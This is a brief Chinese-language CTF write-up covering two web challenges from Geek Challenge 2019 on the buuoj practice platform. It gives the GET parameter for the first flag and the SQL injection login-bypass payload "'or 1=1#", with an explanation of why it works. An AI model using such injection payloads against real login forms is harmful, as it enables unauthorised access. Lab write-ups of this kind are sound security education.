极客大挑战 2019 web 部分解

复现环境:buuoj

0x01:Havefun

F12查看源码,明显html注释里是一段php
极客大挑战 2019 web 部分解
get方式传参数,payload:http://f5cdd431-df98-487f-9400-e8d044fcc945.node3.buuoj.cn/?cat=dog
极客大挑战 2019 web 部分解

0x02:EasySQL

用万能密码
用户名:'or 1=1#
密码 : 随便输
看下用户名和密码都不知道的情况:

username='admin'or 1=1#' and password='随便写'
 #把后面的都注释掉了,1=1为真,最后还为真
上一篇:openssh6.7.deb download packed for debian7/ubuntu12.04 amd64


下一篇:COGS 2434 暗之链锁 题解